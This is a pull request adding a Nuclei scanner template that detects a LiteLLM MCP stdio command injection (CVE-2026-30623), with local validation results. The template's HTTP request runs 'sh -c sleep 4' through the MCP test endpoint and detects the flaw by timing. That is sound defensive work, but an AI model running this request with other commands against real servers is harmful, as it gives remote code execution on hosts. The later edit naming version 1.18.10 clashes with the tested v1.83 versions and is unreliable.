### PR TITLE
Add CVE-2026-30623 LiteLLM MCP Stdio Command Injection template

### DIFF
--- a/http/cves/2026/CVE-2026-30623.yaml
+++ b/http/cves/2026/CVE-2026-30623.yaml
@@ -1,0 +1,70 @@
+id: CVE-2026-30623
+
+info:
+  name: LiteLLM MCP Stdio Command Injection
+  author: leeseungsu
+  severity: high
+  description: |
+    LiteLLM allows authenticated users to configure stdio MCP servers. Vulnerable
+    versions execute arbitrary command values before the MCP connection attempt
+    fails. This template uses a time delay to verify command execution without
+    writing files or making outbound callbacks.
+  impact: |
+    An authenticated attacker with access to MCP server testing or management
+    functionality can execute arbitrary operating system commands with the
+    privileges of the LiteLLM process.
+  remediation: |
+    Upgrade to a patched LiteLLM version that enforces the MCP stdio command
+    allowlist, such as v1.83.7-stable or later.
+  reference:
+    - https://docs.litellm.ai/blog/mcp-stdio-command-injection-april-2026
+    - https://cveawg.mitre.org/api/cve/CVE-2026-30623
+    - https://github.com/BerriAI/litellm
+  classification:
+    cve-id: CVE-2026-30623
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,litellm,rce,authenticated,mcp
+
+variables:
+  marker: "{{randstr}}"
+
+http:
+  - raw:
+      - |
+        POST /mcp-rest/test/connection HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/json
+
+        {
+          "server_id": "nuclei-{{marker}}",
+          "server_name": "nuclei-{{marker}}",
+          "transport": "stdio",
+          "command": "sh",
+          "args": ["-c", "sleep 4"]
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Failed to connect to MCP server"
+
+      - type: word
+        part: body
+        negative: true
+        words:
+          - "not in the allowed commands list"
+          - "Allowed commands"
+
+      - type: dsl
+        dsl:
+          - "duration >= 4"

--- a/http/cves/2026/CVE-2026-30623.yaml
+++ b/http/cves/2026/CVE-2026-30623.yaml
@@ -1,21 +1,15 @@
 id: CVE-2026-30623
 
 info:
-  name: LiteLLM MCP Stdio Command Injection
+  name: LiteLLM 1.18.10 - Command Injection
   author: leeseungsu
   severity: high
   description: |
-    LiteLLM allows authenticated users to configure stdio MCP servers. Vulnerable
-    versions execute arbitrary command values before the MCP connection attempt
-    fails. This template uses a time delay to verify command execution without
-    writing files or making outbound callbacks.
+    LiteLLM 1.18.10 contains a remote code execution caused by lack of validation of arbitrary command and args in MCP server creation, letting attackers execute OS commands remotely, exploit requires crafted JSON configuration.
   impact: |
-    An authenticated attacker with access to MCP server testing or management
-    functionality can execute arbitrary operating system commands with the
-    privileges of the LiteLLM process.
+    Attackers can execute arbitrary OS commands remotely with LiteLLM process privileges, potentially compromising the host system.
   remediation: |
-    Upgrade to a patched LiteLLM version that enforces the MCP stdio command
-    allowlist, such as v1.83.7-stable or later.
+    Update to the latest version of LiteLLM with validation for MCP server commands.
   reference:
     - https://docs.litellm.ai/blog/mcp-stdio-command-injection-april-2026
     - https://cveawg.mitre.org/api/cve/CVE-2026-30623


### PR DESCRIPTION
### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

### Local Validation
Both targets were local Docker containers used only for validation.

Nuclei:
- Version: v3.11.0
- Result: All templates validated successfully

Vulnerable target:
- Image: `ghcr.io/berriai/litellm:v1.83.3-stable`
- URL: `http://localhost:4000`
- Result: matched
- Scan completed in `4.061840542s`
- `1 match found`

Patched target:
- Image: `ghcr.io/berriai/litellm:v1.83.7-stable`
- URL: `http://localhost:4001`
- Result: not matched
- Scan completed in `23.956875ms`
- `No results found`

### Notes

This template uses a time-delay based check with `sleep 4`.

The vulnerable version executes the configured stdio command before MCP connection handling fails. The patched version rejects non-allowlisted stdio commands before execution.